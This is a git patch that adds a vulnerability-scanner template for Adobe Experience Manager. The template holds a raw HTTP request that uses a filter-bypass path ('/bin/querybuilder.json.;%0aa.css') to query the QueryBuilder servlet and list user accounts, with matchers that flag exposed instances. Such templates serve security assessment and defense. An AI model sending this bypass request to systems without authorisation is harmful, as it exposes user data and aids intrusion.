From 477a78379040e01a9bc40712a00ce71c1b69e371 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 5 Apr 2021 22:45:48 +0530
Subject: [PATCH] Added aem-jcr-querybuilder

---
 .../aem/aem-jcr-querybuilder.yaml             | 31 +++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 misconfiguration/aem/aem-jcr-querybuilder.yaml

diff --git a/misconfiguration/aem/aem-jcr-querybuilder.yaml b/misconfiguration/aem/aem-jcr-querybuilder.yaml
new file mode 100644
index 0000000000..3dfcd291c4
--- /dev/null
+++ b/misconfiguration/aem/aem-jcr-querybuilder.yaml
@@ -0,0 +1,31 @@
+id: aem-jcr-querybuilder
+
+info:
+  author: DhiyaneshDk
+  name: Query JCR role via QueryBuilder Servlet
+  severity: info
+  tags: aem
+
+requests:
+  - raw:
+      - |
+        GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+        Cache-Control: max-age=0
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - '"success":true'
+          - 'jcr:uuid'
\ No newline at end of file